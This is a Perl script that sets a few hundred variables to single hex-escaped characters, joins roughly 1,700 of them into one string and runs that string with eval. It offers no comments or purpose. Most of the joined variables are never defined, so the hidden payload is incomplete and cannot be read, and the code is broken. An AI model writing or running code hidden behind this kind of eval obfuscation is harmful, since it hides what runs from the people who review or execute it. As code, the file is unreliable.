$afir1407="\x74";$afir1252="\x69";$afir1078="\x0a";$afir1121="\x6c";$afir1025="\x22";$afir641="\x72";$afir300="\x68";$afir266="\x61";
$afir885="\x69";$afir1471="\x75";$afir870="\x3c";$afir662="\x65";$afir993="\x22";$afir1683="\x3d";$afir986="\x20";$afir743="\x09";$afir343="\x20";$afir212="\x3d";$afir769="\x28";$afir1635="\x76";$afir1051="\x65";$afir1442="\x75";$afir1474="\x69";
$afir1511="\x65";$afir1306="\x69";$afir1366="\x20";$afir1057="\x65";
$afir417="\x23";$afir181="\x20";$afir1630="\x72";$afir1698="\x61";$afir633="\x20";$afir1144="\x5f";
$afir1165="\x3b";
$afir158="\x24";$afir1064="\x24";$afir390="\x09";$afir630="\x20";$afir1088="\x6d";$afir1505="\x63";$afir698="\x24";
$afir345="\x2b";$afir706="\x65";
$afir64="\x72";$afir103="\x67";$afir1013="\x0a";$afir1616="\x70";$afir1031="\x24";$afir1517="\x6e";$afir1481="\x65";
$afir581="\x65";$afir1191="\x61";$afir34="\x67";$afir31="\x20";$afir1328="\x64";$afir1501="\x6e";$afir1466="\x73";$afir700="\x61";$afir33="\x6e";$afir794="\x0a";$afir1543="\x20";
$afir695="\x22";$afir1178="\x6d";$afir1625="\x65";$afir1534="\x73";$afir1465="\x69";$afir1463="\x73";$afir1628="\x6d";$afir1580="\x29";$afir1047="\x6d";$afir208="\x78";$afir1234="\x2c";$afir1453="\x3b";$afir735="\x24";$afir786="\x29";$afir1107="\x65";$afir507="\x63";$afir1677="\x20";
$afir789="\x3d";
$afir739="\x29";$afir990="\x22";$afir1038="\x6d";$afir1063="\x24";$afir219="\x09";$afir1426="\x30";$afir615="\x3b";$afir543="\x63";$afir38="\x20";$afir1711="\x6e";
$afir351="\x0a";$afir670="\x69";$afir927="\x63";$afir561="\x0a";
$afir1417="\x6e";$afir1476="\x65";$afir936="\x5c";
$afir296="\x6c";$afir1111="\x61";$afir190="\x73";
$afir145="\x61";$afir889="\x0a";$afir1342="\x73";$afir1607="\x6e";$afir354="\x70";$afir1572="\x65";$afir230="\x28";$afir751="\x2e";$afir12="\x20";
$afir908="\x72";
$afir104="\x68";
$afir297="\x64";$afir1264="\x69";$afir1516="\x65";
$afir812="\x65";$afir842="\x61";$afir1483="\x20";
$afir866="\x20";
$afir508="\x6f";$afir626="\x3d";$afir689="\x30";$afir1065="\x76";$afir636="\x20";$afir710="\x69";
$afir1273="\x40";$afir835="\x3d";$afir1661="\x69";$afir582="\x20";$afir463="\x20";$afir1359="\x20";
$afir1125="\x0a";$afir1708="\x6c";$afir904="\x24";$afir1066="\x61";$afir642="\x69";$afir1083="\x75";$afir619="\x6f";$afir1552="\x65";$afir1674="\x6f";$afir1300="\x6e";$afir1245="\x31";$afir546="\x70";$afir779="\x32";$afir492="\x65";$afir204="\x69";$afir780="\x30";$afir244="\x69";$afir1189="\x28";$afir330="\x65";$afir188="\x20";
$afir347="\x69";$afir27="\x68";$afir1187="\x6e";$afir1667="\x24";$afir410="\x0a";$afir423="\x6f";$afir538="\x65";$afir519="\x66";$afir1411="\x25";$afir1092="\x65";
$afir67="\x20";$afir1448="\x74";$afir289="\x69";$afir412="\x7d";$afir721="\x2c";$afir672="\x74";$afir1542="\x65";$afir191="\x63";$afir1515="\x67";$afir1460="\x74";
$afir844="\x5f";
$afir494="\x75";$afir1223="\x3b";$afir438="\x72";
$afir1495="\x6e";$afir547="\x74";$afir1587="\x20";
$afir1230="\x31";$afir1479="\x6f";$afir625="\x20";$afir1544="\x63";$afir981="\x6d";$afir1568="\x78";$afir372="\x74";$afir1468="\x72";
$afir231="\x29";
$afir1084="\x72";$afir772="\x74";$afir25="\x72";$afir933="\x3d";
$afir261="\x6e";$afir1650="\x61";$afir850="\x22";$afir523="\x65";
$afir945="\x24";$afir341="\x29";$afir147="\x6f";$afir235="\x2a";
$afir1412="\x63";
$afir1377="\x24";$afir852="\x0a";$afir1276="\x32";$afir233="\x24";$afir1497="\x79";
$afir1028="\x63";$afir99="\x6c";$afir1335="\x3b";$afir742="\x09";
$afir1177="\x09";
$afir=$afir0.
$afir1.
$afir2.$afir3.$afir4.$afir5.$afir6.$afir7.$afir8.
$afir9.$afir10.$afir11.$afir12.$afir13.$afir14.$afir15.$afir16.
$afir17.$afir18.
$afir19.$afir20.$afir21.
$afir22.$afir23.$afir24.
$afir25.$afir26.$afir27.$afir28.$afir29.$afir30.
$afir31.$afir32.$afir33.$afir34.$afir35.$afir36.$afir37.$afir38.$afir39.
$afir40.
$afir41.$afir42.$afir43.$afir44.$afir45.$afir46.$afir47.$afir48.$afir49.$afir50.$afir51.$afir52.$afir53.$afir54.$afir55.$afir56.$afir57.
$afir58.$afir59.$afir60.
$afir61.$afir62.
$afir63.$afir64.$afir65.$afir66.$afir67.$afir68.
$afir69.$afir70.
$afir71.$afir72.$afir73.$afir74.$afir75.$afir76.$afir77.$afir78.$afir79.$afir80.
$afir81.$afir82.$afir83.$afir84.$afir85.$afir86.$afir87.$afir88.$afir89.$afir90.
$afir91.$afir92.$afir93.$afir94.$afir95.$afir96.$afir97.$afir98.$afir99.$afir100.
$afir101.$afir102.$afir103.$afir104.
$afir105.
$afir106.$afir107.$afir108.
$afir109.$afir110.$afir111.$afir112.
$afir113.$afir114.
$afir115.$afir116.$afir117.$afir118.$afir119.$afir120.$afir121.$afir122.$afir123.$afir124.$afir125.$afir126.
$afir127.$afir128.$afir129.$afir130.$afir131.$afir132.$afir133.$afir134.$afir135.
$afir136.$afir137.$afir138.$afir139.$afir140.$afir141.$afir142.$afir143.$afir144.
$afir145.$afir146.$afir147.$afir148.$afir149.$afir150.$afir151.$afir152.$afir153.$afir154.$afir155.$afir156.$afir157.$afir158.$afir159.$afir160.
$afir161.$afir162.
$afir163.$afir164.$afir165.$afir166.$afir167.$afir168.$afir169.$afir170.$afir171.$afir172.$afir173.$afir174.$afir175.$afir176.$afir177.
$afir178.$afir179.$afir180.
$afir181.$afir182.$afir183.$afir184.
$afir185.$afir186.$afir187.$afir188.$afir189.$afir190.$afir191.$afir192.$afir193.$afir194.$afir195.$afir196.$afir197.$afir198.$afir199.$afir200.
$afir201.$afir202.$afir203.$afir204.
$afir205.$afir206.$afir207.$afir208.$afir209.$afir210.
$afir211.$afir212.
$afir213.$afir214.$afir215.$afir216.
$afir217.$afir218.$afir219.
$afir220.
$afir221.$afir222.
$afir223.$afir224.$afir225.
$afir226.$afir227.$afir228.$afir229.$afir230.
$afir231.$afir232.$afir233.$afir234.
$afir235.$afir236.
$afir237.$afir238.$afir239.$afir240.$afir241.
$afir242.$afir243.$afir244.$afir245.$afir246.$afir247.$afir248.$afir249.$afir250.$afir251.$afir252.$afir253.$afir254.$afir255.$afir256.$afir257.$afir258.$afir259.$afir260.
$afir261.$afir262.$afir263.$afir264.$afir265.$afir266.$afir267.
$afir268.$afir269.$afir270.
$afir271.$afir272.
$afir273.$afir274.$afir275.
$afir276.$afir277.$afir278.
$afir279.$afir280.$afir281.$afir282.
$afir283.$afir284.$afir285.$afir286.
$afir287.$afir288.$afir289.
$afir290.
$afir291.$afir292.$afir293.$afir294.$afir295.
$afir296.$afir297.
$afir298.$afir299.
$afir300.$afir301.$afir302.$afir303.$afir304.$afir305.
$afir306.
$afir307.$afir308.$afir309.$afir310.$afir311.$afir312.$afir313.$afir314.$afir315.$afir316.$afir317.$afir318.$afir319.$afir320.$afir321.$afir322.$afir323.$afir324.
$afir325.
$afir326.$afir327.$afir328.$afir329.
$afir330.$afir331.$afir332.$afir333.
$afir334.$afir335.$afir336.$afir337.$afir338.$afir339.$afir340.
$afir341.$afir342.
$afir343.$afir344.$afir345.$afir346.$afir347.$afir348.$afir349.$afir350.$afir351.$afir352.$afir353.$afir354.$afir355.$afir356.$afir357.$afir358.$afir359.$afir360.
$afir361.$afir362.$afir363.$afir364.$afir365.$afir366.$afir367.$afir368.
$afir369.$afir370.$afir371.
$afir372.$afir373.$afir374.
$afir375.$afir376.$afir377.$afir378.
$afir379.$afir380.
$afir381.$afir382.$afir383.$afir384.$afir385.$afir386.$afir387.$afir388.$afir389.$afir390.
$afir391.$afir392.$afir393.$afir394.$afir395.$afir396.$afir397.$afir398.$afir399.$afir400.
$afir401.$afir402.$afir403.
$afir404.
$afir405.$afir406.$afir407.$afir408.
$afir409.$afir410.$afir411.$afir412.
$afir413.$afir414.$afir415.$afir416.$afir417.$afir418.$afir419.$afir420.$afir421.$afir422.$afir423.$afir424.$afir425.$afir426.$afir427.$afir428.$afir429.$afir430.$afir431.$afir432.
$afir433.$afir434.$afir435.$afir436.
$afir437.$afir438.$afir439.$afir440.$afir441.$afir442.$afir443.$afir444.$afir445.$afir446.$afir447.$afir448.$afir449.$afir450.
$afir451.$afir452.$afir453.$afir454.$afir455.$afir456.$afir457.
$afir458.$afir459.
$afir460.$afir461.$afir462.
$afir463.
$afir464.$afir465.$afir466.$afir467.$afir468.
$afir469.$afir470.$afir471.$afir472.$afir473.$afir474.$afir475.$afir476.$afir477.$afir478.$afir479.$afir480.
$afir481.$afir482.$afir483.$afir484.$afir485.$afir486.$afir487.$afir488.$afir489.
$afir490.$afir491.$afir492.
$afir493.$afir494.$afir495.
$afir496.$afir497.$afir498.$afir499.$afir500.$afir501.$afir502.$afir503.$afir504.$afir505.
$afir506.$afir507.$afir508.$afir509.$afir510.
$afir511.$afir512.$afir513.$afir514.$afir515.$afir516.
$afir517.$afir518.$afir519.$afir520.
$afir521.$afir522.$afir523.$afir524.$afir525.$afir526.$afir527.$afir528.$afir529.$afir530.
$afir531.$afir532.$afir533.$afir534.$afir535.$afir536.$afir537.$afir538.$afir539.
$afir540.
$afir541.$afir542.$afir543.$afir544.$afir545.$afir546.$afir547.$afir548.$afir549.$afir550.$afir551.$afir552.$afir553.$afir554.$afir555.$afir556.$afir557.$afir558.
$afir559.$afir560.
$afir561.$afir562.$afir563.$afir564.$afir565.
$afir566.$afir567.
$afir568.$afir569.$afir570.$afir571.$afir572.$afir573.$afir574.$afir575.$afir576.$afir577.$afir578.$afir579.
$afir580.$afir581.$afir582.
$afir583.$afir584.$afir585.
$afir586.
$afir587.$afir588.
$afir589.$afir590.$afir591.$afir592.
$afir593.$afir594.
$afir595.$afir596.$afir597.$afir598.
$afir599.$afir600.
$afir601.$afir602.
$afir603.$afir604.$afir605.$afir606.
$afir607.$afir608.$afir609.$afir610.$afir611.$afir612.
$afir613.$afir614.$afir615.$afir616.
$afir617.$afir618.$afir619.$afir620.
$afir621.$afir622.$afir623.$afir624.$afir625.$afir626.$afir627.$afir628.$afir629.$afir630.$afir631.$afir632.$afir633.$afir634.
$afir635.$afir636.
$afir637.$afir638.$afir639.$afir640.$afir641.$afir642.$afir643.
$afir644.$afir645.$afir646.
$afir647.$afir648.$afir649.$afir650.$afir651.$afir652.$afir653.$afir654.$afir655.$afir656.$afir657.$afir658.
$afir659.$afir660.$afir661.$afir662.$afir663.$afir664.$afir665.$afir666.$afir667.$afir668.$afir669.$afir670.
$afir671.$afir672.$afir673.$afir674.$afir675.
$afir676.
$afir677.$afir678.$afir679.$afir680.
$afir681.$afir682.
$afir683.$afir684.$afir685.$afir686.$afir687.$afir688.$afir689.$afir690.
$afir691.$afir692.$afir693.$afir694.$afir695.$afir696.
$afir697.
$afir698.$afir699.$afir700.
$afir701.$afir702.$afir703.$afir704.$afir705.
$afir706.$afir707.$afir708.
$afir709.$afir710.$afir711.$afir712.$afir713.$afir714.
$afir715.$afir716.$afir717.$afir718.$afir719.$afir720.
$afir721.$afir722.$afir723.$afir724.
$afir725.$afir726.$afir727.$afir728.$afir729.$afir730.$afir731.$afir732.$afir733.$afir734.$afir735.
$afir736.$afir737.$afir738.$afir739.$afir740.$afir741.$afir742.$afir743.$afir744.$afir745.$afir746.$afir747.$afir748.$afir749.$afir750.$afir751.$afir752.
$afir753.$afir754.$afir755.$afir756.$afir757.$afir758.$afir759.$afir760.$afir761.$afir762.$afir763.
$afir764.
$afir765.
$afir766.$afir767.$afir768.$afir769.$afir770.$afir771.$afir772.
$afir773.$afir774.$afir775.$afir776.$afir777.
$afir778.$afir779.
$afir780.
$afir781.$afir782.$afir783.$afir784.
$afir785.$afir786.$afir787.$afir788.$afir789.$afir790.$afir791.$afir792.
$afir793.$afir794.$afir795.
$afir796.$afir797.$afir798.$afir799.$afir800.
$afir801.$afir802.$afir803.$afir804.$afir805.$afir806.$afir807.$afir808.$afir809.$afir810.$afir811.$afir812.$afir813.$afir814.$afir815.$afir816.
$afir817.
$afir818.
$afir819.$afir820.
$afir821.$afir822.$afir823.$afir824.$afir825.$afir826.$afir827.$afir828.$afir829.$afir830.$afir831.
$afir832.
$afir833.$afir834.
$afir835.$afir836.$afir837.$afir838.$afir839.$afir840.
$afir841.$afir842.$afir843.$afir844.$afir845.
$afir846.$afir847.$afir848.$afir849.$afir850.
$afir851.$afir852.$afir853.$afir854.
$afir855.$afir856.
$afir857.$afir858.$afir859.$afir860.$afir861.
$afir862.$afir863.$afir864.
$afir865.$afir866.$afir867.$afir868.$afir869.
$afir870.$afir871.$afir872.$afir873.$afir874.$afir875.$afir876.$afir877.$afir878.$afir879.$afir880.
$afir881.$afir882.
$afir883.$afir884.$afir885.$afir886.$afir887.$afir888.
$afir889.$afir890.$afir891.$afir892.$afir893.$afir894.$afir895.$afir896.
$afir897.$afir898.
$afir899.$afir900.
$afir901.$afir902.$afir903.$afir904.
$afir905.$afir906.$afir907.$afir908.$afir909.$afir910.
$afir911.
$afir912.$afir913.$afir914.$afir915.$afir916.$afir917.$afir918.$afir919.$afir920.$afir921.$afir922.$afir923.$afir924.$afir925.
$afir926.$afir927.$afir928.
$afir929.$afir930.$afir931.$afir932.$afir933.$afir934.
$afir935.$afir936.
$afir937.$afir938.
$afir939.$afir940.$afir941.
$afir942.$afir943.$afir944.$afir945.
$afir946.$afir947.$afir948.$afir949.$afir950.$afir951.$afir952.$afir953.$afir954.$afir955.$afir956.$afir957.$afir958.$afir959.
$afir960.
$afir961.$afir962.
$afir963.$afir964.
$afir965.$afir966.$afir967.$afir968.
$afir969.$afir970.$afir971.$afir972.$afir973.$afir974.$afir975.
$afir976.$afir977.$afir978.$afir979.$afir980.
$afir981.$afir982.$afir983.$afir984.
$afir985.$afir986.$afir987.$afir988.$afir989.$afir990.
$afir991.$afir992.$afir993.$afir994.$afir995.$afir996.$afir997.$afir998.$afir999.$afir1000.
$afir1001.$afir1002.$afir1003.$afir1004.
$afir1005.$afir1006.$afir1007.$afir1008.
$afir1009.$afir1010.$afir1011.$afir1012.$afir1013.$afir1014.
$afir1015.$afir1016.$afir1017.$afir1018.
$afir1019.$afir1020.
$afir1021.$afir1022.$afir1023.
$afir1024.$afir1025.$afir1026.$afir1027.$afir1028.$afir1029.$afir1030.$afir1031.$afir1032.$afir1033.$afir1034.$afir1035.$afir1036.$afir1037.$afir1038.$afir1039.$afir1040.
$afir1041.$afir1042.$afir1043.$afir1044.$afir1045.$afir1046.$afir1047.$afir1048.$afir1049.$afir1050.
$afir1051.$afir1052.$afir1053.$afir1054.$afir1055.$afir1056.$afir1057.$afir1058.$afir1059.$afir1060.$afir1061.$afir1062.$afir1063.$afir1064.
$afir1065.$afir1066.
$afir1067.$afir1068.$afir1069.$afir1070.$afir1071.$afir1072.$afir1073.$afir1074.$afir1075.$afir1076.
$afir1077.$afir1078.$afir1079.$afir1080.$afir1081.
$afir1082.$afir1083.$afir1084.
$afir1085.$afir1086.$afir1087.$afir1088.$afir1089.
$afir1090.$afir1091.$afir1092.
$afir1093.$afir1094.$afir1095.
$afir1096.
$afir1097.$afir1098.
$afir1099.$afir1100.$afir1101.
$afir1102.$afir1103.$afir1104.
$afir1105.$afir1106.$afir1107.$afir1108.$afir1109.
$afir1110.
$afir1111.$afir1112.$afir1113.
$afir1114.$afir1115.$afir1116.
$afir1117.$afir1118.$afir1119.$afir1120.
$afir1121.$afir1122.$afir1123.$afir1124.$afir1125.
$afir1126.$afir1127.$afir1128.$afir1129.$afir1130.$afir1131.$afir1132.$afir1133.$afir1134.
$afir1135.$afir1136.
$afir1137.$afir1138.$afir1139.$afir1140.
$afir1141.$afir1142.$afir1143.$afir1144.
$afir1145.$afir1146.$afir1147.$afir1148.$afir1149.$afir1150.$afir1151.$afir1152.$afir1153.$afir1154.
$afir1155.
$afir1156.$afir1157.
$afir1158.$afir1159.$afir1160.$afir1161.$afir1162.$afir1163.$afir1164.
$afir1165.$afir1166.$afir1167.$afir1168.$afir1169.
$afir1170.
$afir1171.$afir1172.$afir1173.$afir1174.$afir1175.$afir1176.$afir1177.
$afir1178.$afir1179.$afir1180.$afir1181.
$afir1182.$afir1183.$afir1184.
$afir1185.$afir1186.
$afir1187.$afir1188.
$afir1189.$afir1190.$afir1191.$afir1192.
$afir1193.$afir1194.
$afir1195.$afir1196.
$afir1197.$afir1198.$afir1199.$afir1200.$afir1201.$afir1202.
$afir1203.$afir1204.$afir1205.$afir1206.
$afir1207.$afir1208.
$afir1209.$afir1210.$afir1211.$afir1212.$afir1213.$afir1214.$afir1215.$afir1216.$afir1217.$afir1218.
$afir1219.$afir1220.$afir1221.$afir1222.$afir1223.$afir1224.$afir1225.$afir1226.$afir1227.$afir1228.$afir1229.$afir1230.
$afir1231.
$afir1232.$afir1233.$afir1234.$afir1235.$afir1236.
$afir1237.$afir1238.$afir1239.$afir1240.$afir1241.$afir1242.
$afir1243.$afir1244.$afir1245.$afir1246.$afir1247.$afir1248.
$afir1249.$afir1250.$afir1251.$afir1252.$afir1253.$afir1254.$afir1255.$afir1256.$afir1257.$afir1258.
$afir1259.$afir1260.
$afir1261.
$afir1262.$afir1263.$afir1264.
$afir1265.$afir1266.$afir1267.$afir1268.
$afir1269.$afir1270.$afir1271.$afir1272.$afir1273.$afir1274.$afir1275.$afir1276.$afir1277.$afir1278.$afir1279.$afir1280.
$afir1281.$afir1282.$afir1283.$afir1284.$afir1285.
$afir1286.
$afir1287.$afir1288.$afir1289.$afir1290.$afir1291.$afir1292.$afir1293.
$afir1294.$afir1295.$afir1296.$afir1297.$afir1298.$afir1299.$afir1300.
$afir1301.$afir1302.$afir1303.$afir1304.$afir1305.$afir1306.$afir1307.$afir1308.$afir1309.
$afir1310.$afir1311.$afir1312.$afir1313.$afir1314.
$afir1315.$afir1316.$afir1317.$afir1318.
$afir1319.$afir1320.$afir1321.$afir1322.$afir1323.$afir1324.$afir1325.$afir1326.$afir1327.$afir1328.$afir1329.$afir1330.
$afir1331.$afir1332.
$afir1333.$afir1334.$afir1335.
$afir1336.$afir1337.$afir1338.$afir1339.$afir1340.
$afir1341.$afir1342.$afir1343.$afir1344.$afir1345.$afir1346.$afir1347.$afir1348.$afir1349.$afir1350.
$afir1351.
$afir1352.
$afir1353.$afir1354.$afir1355.
$afir1356.
$afir1357.
$afir1358.$afir1359.
$afir1360.$afir1361.$afir1362.$afir1363.$afir1364.$afir1365.
$afir1366.
$afir1367.$afir1368.$afir1369.$afir1370.$afir1371.$afir1372.$afir1373.$afir1374.
$afir1375.$afir1376.$afir1377.$afir1378.
$afir1379.$afir1380.
$afir1381.$afir1382.$afir1383.$afir1384.
$afir1385.$afir1386.$afir1387.$afir1388.$afir1389.
$afir1390.$afir1391.$afir1392.
$afir1393.$afir1394.$afir1395.$afir1396.$afir1397.$afir1398.$afir1399.$afir1400.
$afir1401.$afir1402.$afir1403.$afir1404.
$afir1405.$afir1406.$afir1407.$afir1408.
$afir1409.$afir1410.$afir1411.$afir1412.$afir1413.
$afir1414.
$afir1415.$afir1416.$afir1417.$afir1418.$afir1419.
$afir1420.
$afir1421.
$afir1422.$afir1423.$afir1424.
$afir1425.$afir1426.
$afir1427.$afir1428.$afir1429.$afir1430.$afir1431.
$afir1432.$afir1433.$afir1434.$afir1435.$afir1436.$afir1437.$afir1438.$afir1439.$afir1440.
$afir1441.$afir1442.$afir1443.$afir1444.$afir1445.$afir1446.$afir1447.$afir1448.$afir1449.$afir1450.$afir1451.$afir1452.$afir1453.$afir1454.$afir1455.$afir1456.
$afir1457.$afir1458.$afir1459.$afir1460.$afir1461.
$afir1462.$afir1463.$afir1464.$afir1465.$afir1466.$afir1467.
$afir1468.$afir1469.$afir1470.
$afir1471.$afir1472.$afir1473.$afir1474.$afir1475.$afir1476.$afir1477.$afir1478.$afir1479.$afir1480.
$afir1481.$afir1482.$afir1483.$afir1484.$afir1485.
$afir1486.$afir1487.$afir1488.$afir1489.$afir1490.$afir1491.$afir1492.$afir1493.$afir1494.
$afir1495.$afir1496.$afir1497.
$afir1498.
$afir1499.$afir1500.$afir1501.$afir1502.$afir1503.$afir1504.$afir1505.$afir1506.$afir1507.$afir1508.
$afir1509.$afir1510.$afir1511.$afir1512.$afir1513.$afir1514.$afir1515.
$afir1516.$afir1517.$afir1518.
$afir1519.
$afir1520.
$afir1521.$afir1522.$afir1523.$afir1524.$afir1525.$afir1526.$afir1527.$afir1528.$afir1529.$afir1530.
$afir1531.$afir1532.$afir1533.$afir1534.$afir1535.$afir1536.
$afir1537.$afir1538.$afir1539.$afir1540.
$afir1541.$afir1542.
$afir1543.$afir1544.
$afir1545.$afir1546.$afir1547.$afir1548.$afir1549.$afir1550.$afir1551.$afir1552.$afir1553.$afir1554.$afir1555.$afir1556.$afir1557.
$afir1558.$afir1559.$afir1560.
$afir1561.$afir1562.$afir1563.$afir1564.$afir1565.$afir1566.$afir1567.$afir1568.
$afir1569.$afir1570.$afir1571.$afir1572.$afir1573.$afir1574.$afir1575.
$afir1576.$afir1577.$afir1578.$afir1579.$afir1580.$afir1581.$afir1582.$afir1583.$afir1584.
$afir1585.
$afir1586.$afir1587.$afir1588.$afir1589.
$afir1590.$afir1591.$afir1592.
$afir1593.
$afir1594.$afir1595.$afir1596.
$afir1597.$afir1598.$afir1599.$afir1600.$afir1601.$afir1602.$afir1603.$afir1604.$afir1605.
$afir1606.$afir1607.$afir1608.
$afir1609.$afir1610.$afir1611.
$afir1612.$afir1613.$afir1614.$afir1615.
$afir1616.$afir1617.$afir1618.
$afir1619.$afir1620.
$afir1621.
$afir1622.$afir1623.$afir1624.$afir1625.$afir1626.
$afir1627.$afir1628.
$afir1629.$afir1630.$afir1631.$afir1632.
$afir1633.$afir1634.$afir1635.$afir1636.$afir1637.$afir1638.$afir1639.$afir1640.$afir1641.$afir1642.$afir1643.$afir1644.
$afir1645.$afir1646.$afir1647.$afir1648.$afir1649.$afir1650.$afir1651.$afir1652.$afir1653.$afir1654.
$afir1655.$afir1656.
$afir1657.
$afir1658.$afir1659.
$afir1660.$afir1661.$afir1662.
$afir1663.$afir1664.$afir1665.
$afir1666.$afir1667.$afir1668.$afir1669.$afir1670.
$afir1671.$afir1672.
$afir1673.$afir1674.
$afir1675.$afir1676.
$afir1677.$afir1678.$afir1679.$afir1680.
$afir1681.$afir1682.$afir1683.$afir1684.$afir1685.$afir1686.$afir1687.$afir1688.$afir1689.$afir1690.$afir1691.$afir1692.$afir1693.
$afir1694.$afir1695.$afir1696.$afir1697.$afir1698.$afir1699.$afir1700.$afir1701.$afir1702.$afir1703.$afir1704.$afir1705.$afir1706.$afir1707.$afir1708.
$afir1709.$afir1710.$afir1711.$afir1712.$afir1713.$afir1714.$afir1715;$c='afir';eval $afir;